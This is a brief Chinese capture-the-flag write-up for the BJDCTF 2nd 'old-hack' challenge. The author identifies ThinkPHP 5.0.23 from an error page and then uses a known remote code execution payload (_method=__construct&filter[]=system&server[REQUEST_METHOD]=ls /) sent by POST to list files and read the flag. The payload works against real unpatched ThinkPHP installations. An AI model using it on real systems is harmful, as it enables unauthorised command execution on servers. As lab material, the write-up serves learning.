[BJDCTF 2nd]old-hack_thinkphp5漏洞 进入页面提示是thinkphp,先构造一个报错 然后看到版本为THINK_VERSION5.0.23 然后百度查询漏洞: payload:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / POST提交尝试一下,发现可行,然后就cat /flag